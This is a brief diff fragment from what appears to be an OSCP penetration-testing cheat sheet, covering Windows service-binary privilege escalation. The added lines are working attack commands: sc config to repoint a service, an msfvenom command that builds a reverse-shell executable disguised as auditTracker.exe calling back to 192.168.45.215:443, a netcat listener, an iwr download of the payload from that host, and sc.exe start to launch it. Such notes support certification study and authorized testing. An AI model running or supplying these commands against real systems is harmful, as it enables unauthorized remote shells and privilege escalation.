Kevinolinn8/OSCP-Cheatsheet/README.md

 sc qc <servicename> #find binary path variable sc config <service> <option>="<value>" #change the path to the reverse shell location sc start <servicename>

+#instead of adding user dave2 we can also over write a binary to add a rev shell (auditTracker.exe in this example)
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.215 LPORT=443 -f exe -o auditTracker.exe
+kali$ nc -lnvp 443 #start netcat on kali try to use ports that are open on the machine instead of 4444 iwr -uri http://192.168.45.215:8000/auditTracker.exe -outfile auditTracker.exe #go to folder with executable and write our shell sc.exe start auditTracker #start binary

 ```

 ### Unquoted Service Path